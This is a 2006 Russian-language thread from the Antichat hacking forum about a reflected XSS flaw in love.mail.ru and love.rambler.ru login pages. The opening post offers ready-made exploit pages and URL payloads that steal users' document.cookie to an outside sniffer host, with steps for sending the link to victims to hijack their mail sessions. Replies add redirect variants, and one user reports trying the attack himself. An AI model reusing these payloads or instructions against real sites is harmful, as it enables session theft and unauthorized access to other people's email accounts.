HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу XSS mail.ru rambler.ru
   
Ответ
Страница 1 из 7 1 2 3 4 5 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

XSS mail.ru rambler.ru
  #1  
Старый 04.12.2006, 20:40
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию XSS mail.ru rambler.ru
Гы гы ... долго же вы ждали темы как ломать эти почтовики =)

Старый добрый дядя slider вам расскроет тайну Да.. да... прям возьмём и угоним сессию..

Короче ... дело было вечером .. делать было нечего..
и полез я искать уязвимости на этих почтовиках..

После многих часов поиска (уважайте чужой труд! ) нашол таки...
в файле http://love.mail.ru/my/login.phtml скрытую строку:
Код HTML:
<input type="hidden" name="tcurl">
Да да... именно она слабое звено!...
паразитка такая не фильтруетсо =)

вбил я в нее "><script>alert()</script> и вылез заветный алерт!..


А вот тут по сценарию вам надо дать exploit ))
С переадрессацией и со всеми наворотами ))

А вот он б*я =)

майл.ru

Код HTML:
<body onload="p.submit()">
<form action="http://love.mail.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.mail.ru")</script>'>
рамблер.ru


Код HTML:
<body onload="p.submit()">
<form action="http://love.rambler.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.rambler.ru")</script>'>

СПРОСИТЕ ВЫ А ПРИЧЁМ ТУТ ПОЧТОВИК mail.ru и rambler.ru ?

А вот причём... кука прийдёт и от лов и от майла! =)
Так что статейка думаю многим пригодистя =)

Ну что.. время пошло кто не успел тот опоздал... =)
Торопитесь время акции ограничего =)

С уважением slider


Ахх да... как юзать ))
Сохраняете этот "сплойт" в html и качаете на народ.ru
далее даёте ссылку комунить на свой "скрипт"... ))
Удачи!..

Вот вам ещё скриптеГ =)

Код HTML:
http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>
Чтоб было меньше палева .. кодируем это .. и получисо чтот типа того!..

Код HTML:
http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось slider; 05.12.2006 в 17:48..
 
Ответить с цитированием

  #2  
Старый 04.12.2006, 20:53
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию
Засекаем время сколько бага проживет =)
 
Ответить с цитированием

  #3  
Старый 04.12.2006, 20:56
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию
Отпишитесь хоть.. КОМУ пригодилось! =)
 
Ответить с цитированием

  #4  
Старый 04.12.2006, 21:14
[loy]
Участник форума
Регистрация: 24.03.2006
Сообщений: 184
С нами: 10596532

Репутация: 72
По умолчанию
http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3Cscript%3Ealert('12');%3 C/script%3E%22!--%3C

или так http://love.mail.ru/my/login.phtml?tcurl="><script>document.location='htt p://forum.antichat.ru';</script><!--"
<a href='http://love.mail.ru/my/login.phtml?tcurl="><script>document.location=\'ht tp://forum.antichat.ru\'</script><!--"'>ФОрум</a>

я конечно не понял точно как сделал слайдер
но вот как я сделел
Последний раз редактировалось [loy]; 04.12.2006 в 21:28..
 
Ответить с цитированием

  #5  
Старый 04.12.2006, 21:18
Chumak
Познающий
Регистрация: 27.10.2006
Сообщений: 59
С нами: 10283366

Репутация: 6
По умолчанию
Мда только жаль что я ен умею этим пользоваться..
 
Ответить с цитированием

  #6  
Старый 04.12.2006, 21:20
Chumak
Познающий
Регистрация: 27.10.2006
Сообщений: 59
С нами: 10283366

Репутация: 6
По умолчанию
"Торопитесь время акции ограничего =)"
Мда
 
Ответить с цитированием

  #7  
Старый 04.12.2006, 21:31
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию
http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>

И так можно использовать!!! =)
но это как то банально!
Последний раз редактировалось slider; 04.12.2006 в 21:41..
 
Ответить с цитированием

  #8  
Старый 04.12.2006, 22:15
MegaBits
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
С нами: 10366322

Репутация: 45
По умолчанию
Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>?
Извените за тупые вопросы просто с XSS плохо разбираюсь.
 
Ответить с цитированием

  #9  
Старый 04.12.2006, 22:30
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию
Цитата:
Сообщение от MegaBits  
Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>?
Извените за тупые вопросы просто с XSS плохо разбираюсь.
Обычная пассивная xss
Жертва должна перейти по ссылке, либо быть перенаправленной на нее
 
Ответить с цитированием

  #10  
Старый 04.12.2006, 22:31
xzz
Новичок
Регистрация: 06.11.2006
Сообщений: 2
С нами: 10268891

Репутация: -2
По умолчанию
Только что опробовал, сделал все как по учебнику ,скрипт вроде рабочий,..но мля куки на снифер не летят.
Кто нить знает в чем причина? В снифере, как была одна запись ...так одна и есть. Mожет я не правильно снифер зарегал ? В " Картинка" что нано писать? Изаиняюсь за дебильные вопросы........
Последний раз редактировалось xzz; 04.12.2006 в 22:44..
 
Ответить с цитированием
Ответ
Страница 1 из 7 1 2 3 4 5 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Реализация XSS на rambler.ru Майор Уязвимости Mail-сервис 8 21.09.2006 20:50
Xss на mail.ru em00s7 Уязвимости Mail-сервис 14 08.06.2006 00:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.